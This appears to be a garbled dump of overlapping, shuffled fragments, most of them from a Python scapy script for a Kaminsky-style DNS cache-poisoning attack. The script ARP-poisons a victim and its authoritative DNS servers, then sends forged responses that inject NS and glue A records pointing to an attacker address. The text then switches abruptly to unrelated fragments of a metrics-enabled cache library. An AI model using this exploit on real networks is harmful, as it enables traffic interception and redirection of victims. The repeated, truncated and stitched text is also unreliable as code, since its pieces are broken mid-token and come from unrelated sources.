poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst ==", "= args # listen for packets on all interfaces (expect query request from", "from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not", "print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and", "silent(args): # ARP poison the vicitims (two way ARP poisoning) for ip in", "rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif", "the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) /", "pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)", "<reponame>filipdavidovic/kaminsky_vulnerability import argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP,", "Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors", "\"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge):", "qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" +", "== globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id,", "in args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain =", "ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)", "pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if 
(globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): #", "ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars import", "import utils from arppoison import arppoison import sys import socket def silent(args): #", "sys import socket def silent(args): # ARP poison the vicitims (two way ARP", "spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1,", "(globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the", "globalargs.soaIP): # return the response to the victim (it will think its from", "will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\", "to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt,", "ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" +", "import ccolors import utils from arppoison import arppoison import sys import socket def", "= IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,", "DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison import arppoison", "ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain", "/ UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args #", "and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it will", "from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /", "src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ 
DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\", "IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison", "print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" + ccolors.NC", "import socket def silent(args): # ARP poison the vicitims (two way ARP poisoning)", "poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request to the", "request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or", "the victim (it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src,", "an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC +", "verbose=False) global globalargs globalargs = args # listen for packets on all interfaces", "send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt =", "args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs", "# send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt", "def silent(args): # ARP poison the vicitims (two way ARP poisoning) for ip", "rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING +", "def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain", "\\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC", "for packets on all interfaces (expect query request from victim to authoritative DNS)", "victim (it will think its from the authoritative DNS) spoof_pkt = 
IP(dst=pkt[IP].src, src=pkt[IP].dst)", "pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst", "in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim", "vars import ccolors import utils from arppoison import arppoison import sys import socket", "qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False)", "to the victim (it will think its from the authoritative DNS) spoof_pkt =", "request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) /", "(expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not", "type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC", "args # listen for packets on all interfaces (expect query request from victim", "DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN", "DNSQR, DNSRR from vars import ccolors import utils from arppoison import arppoison import", "scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from", "or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in", "on all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def", "IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\", "DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, 
\\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge,", "type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN +", "ARP poison the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim,", "(pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it will think", "not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and", "+ args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global", "socket def silent(args): # ARP poison the vicitims (two way ARP poisoning) for", "(globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\", "send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets on all", "pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it", "arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain = utils.getRandomSubdomain() +", "UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl),", "ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst", "utils from arppoison import arppoison import sys import socket def silent(args): # ARP", "UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from arppoison import", "vicitims (two way 
ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send", "(it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /", "rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim", "all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt):", "interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if", "if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname)", "(pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\", "verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" +", "/ \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname,", "from vars import ccolors import utils from arppoison import arppoison import sys import", "from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR", "= IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs =", "think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport,", "arppoison import arppoison import sys import socket def silent(args): # ARP poison the", "rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\"", "victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain 
reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0,", "DNSRR from vars import ccolors import utils from arppoison import arppoison import sys", "ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request to", "listen for packets on all interfaces (expect query request from victim to authoritative", "ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain", "query request to the victim args.randomSubdomain = utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim)", "globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1,", "# listen for packets on all interfaces (expect query request from victim to", "qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl))", "/ DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for", "import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR, DNSRR from vars", "way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query request", "ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\" + ccolors.NC sys.exit()", "ccolors import utils from arppoison import arppoison import sys import socket def silent(args):", "/ \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS',", "verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the", "to the victim args.randomSubdomain = utils.getRandomSubdomain() + 
args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123)", "+ ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src,", "type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING", "\\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A',", "\\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\",", "verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname)", "\\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0],", "argparse from scapy.all import ARP, Ether, sniff, sendp, send, IP, UDP, DNS, DNSQR,", "DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else:", "authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id,", "\\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS poisoned...\\n\"", "send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack successful!\\n\" + ccolors.NC + ccolors.WARNING + \"Terminating...\"", "\\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) 
send(spoof_pkt, verbose=False) print", "UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen", "aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Attack", "from arppoison import arppoison import sys import socket def silent(args): # ARP poison", "in globalargs.soaIP): # return the response to the victim (it will think its", "poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt =", "return the response to the victim (it will think its from the authoritative", "reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs", "globalargs globalargs = args # listen for packets on all interfaces (expect query", "poison the vicitims (two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip)", "DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1,", "/ \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0],", "ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + \"Victim DNS", "ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN", "# return the response to the victim (it will think its from the", "sendp, send, IP, UDP, DNS, 
DNSQR, DNSRR from vars import ccolors import utils", "for ip in args.soaIP: arppoison(args.victim, ip) # send query request to the victim", "sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return", "sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if", "(two way ARP poisoning) for ip in args.soaIP: arppoison(args.victim, ip) # send query", "DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets", "in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport,", "globalargs = args # listen for packets on all interfaces (expect query request", "utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False)", "elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /", "UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\"))", "ip in args.soaIP: arppoison(args.victim, ip) # send query request to the victim args.randomSubdomain", "IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args", "# ARP poison the vicitims (two way ARP poisoning) for ip in args.soaIP:", "DNS poisoned...\\n\" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt", "authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, 
verbose=False)", "sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\", "/ \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False)", "= utils.getRandomSubdomain() + args.targetDomain reqPkt = IP(dst=args.victim) / UDP(sport=123) / DNS(qr=0, qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt,", "the response to the victim (it will think its from the authoritative DNS)", "aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \\ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt,", "else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response", "= IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0,", "send, IP, UDP, DNS, DNSQR, DNSRR from vars import ccolors import utils from", "if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to", "query request from victim to authoritative DNS) sniff(prn=dnsSpoof) def dnsSpoof(pkt): if not pkt.haslayer(DNSQR)", "sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt,", "packets on all interfaces (expect query request from victim to authoritative DNS) sniff(prn=dnsSpoof)", "global globalargs globalargs = args # listen for packets on all interfaces (expect", "src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \\ ns=DNSRR(rrname=globalargs.targetDomain,", "qr=1, aa=1, 
rcode=0, qd=pkt[DNS].qd, \\ an=DNSRR(rrname=pkt[DNS].qd.qname, type=\"A\", rdata=\"172.16.58.3\")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN +", "qd=DNSQR(qname=args.randomSubdomain)) send(reqPkt, verbose=False) global globalargs globalargs = args # listen for packets on", "its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)", "import arppoison import sys import socket def silent(args): # ARP poison the vicitims" ]
[ "refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs):", "be updated with +1 each time there's a cache hit :param cache_miss: a", "MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None,", "evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try:", "None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss = cache_miss self.cache_hits =", "None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter def value_getter_replacement(item):", "old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1) value_getter = value_getter_replacement if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter)", "logger = logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! :param cache_hits:", "self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item): if self.has_info_about(item): if self.cache_hits:", "with +1 each time there's a cache refresh :param how_long_refresh_takes: a metric that", "= refreshes self.evictions = evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is", "that will be updated with +1 each time there's a cache refresh :param", "LRUCacheDict, ExclusiveWritebackCache from satella.coding.typing import K, V from .. 
import Metric from ..metric_types.callable", "metric that will be updated with +1 each time there's a cache refresh", "None, cache_miss: tp.Optional[CounterMetric] = None, refreshes: tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None):", "= cache_hits self.cache_miss = cache_miss self.refreshes = refreshes self.evictions = evictions self.how_long_refresh_takes =", "value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, max_size: int = 100, cache_hits: tp.Optional[Metric] = None,", "else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item) class MetrifiedExclusiveWritebackCache(ExclusiveWritebackCache[K, V]): __slots__ = ('cache_miss', 'cache_hits')", "tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric] = None, **kwargs): if refreshes: old_value_getter = value_getter", "None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item): try:", "ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval: float, value_getter,", "tp.Optional[CounterMetric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def", "= evictions self.how_long_refresh_takes = how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1)", "cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs): super().__init__(*args, **kwargs) self.cache_miss =", "stale_interval, expiration_interval, value_getter, value_getter_executor=None, cache_failures_interval=None, time_getter=time.monotonic, default_value_factory=None, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric]", "= value_getter_replacement if how_long_refresh_takes: 
value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter,", "cache_hits if entries_waiting is not None: entries_waiting.callable = self.get_queue_length() def __getitem__(self, item): if", "= ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] =", "value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size) self.cache_hits = cache_hits self.cache_miss = cache_miss self.refreshes =", "tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions: tp.Optional[Metric]", "__getitem__(self, item): if self.has_info_about(item): if self.cache_hits: self.cache_hits.runtime(+1) else: if self.cache_miss: self.cache_miss.runtime(+1) return super().__getitem__(item)", "if how_long_refresh_takes: value_getter = how_long_refresh_takes.measure(value_getter=time_getter)(value_getter) super().__init__(stale_interval, expiration_interval, value_getter, value_getter_executor, cache_failures_interval, time_getter, default_value_factory, max_size=max_size)", "refreshes: old_value_getter = value_getter def value_getter_replacement(item): try: return old_value_getter(item) finally: if self.refreshes: self.refreshes.runtime(+1)", "cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric] = None, entries_waiting: tp.Optional[CallableMetric] = None, **kwargs):", "will be ticked with time value_getter took \"\"\" def __init__(self, stale_interval: float, expiration_interval:", "updated with +1 each time there's a cache refresh :param how_long_refresh_takes: a metric", "logging.getLogger(__name__) class MetrifiedCacheDict(CacheDict[K, V]): \"\"\" A CacheDict with metrics! 
:param cache_hits: a counter", "cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None, evictions:", "None, cache_miss: tp.Optional[Metric] = None, refreshes: tp.Optional[Metric] = None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None,", "__slots__ = ('cache_miss', 'cache_hits') def __init__(self, *args, cache_hits: tp.Optional[CounterMetric] = None, cache_miss: tp.Optional[CounterMetric]", "each time there's a cache miss :param refreshes: a metric that will be", "metrics! :param cache_hits: a counter metric that will be updated with +1 each", "= None, how_long_refresh_takes: tp.Optional[MeasurableMixin] = None): if refreshes: old_value_getter = value_getter def value_getter_replacement(item):", "how_long_refresh_takes def evict(self): if self.evictions is not None: self.evictions.runtime(+1) super().evict() def __getitem__(self, item):", "def evict(self): if self.evictions 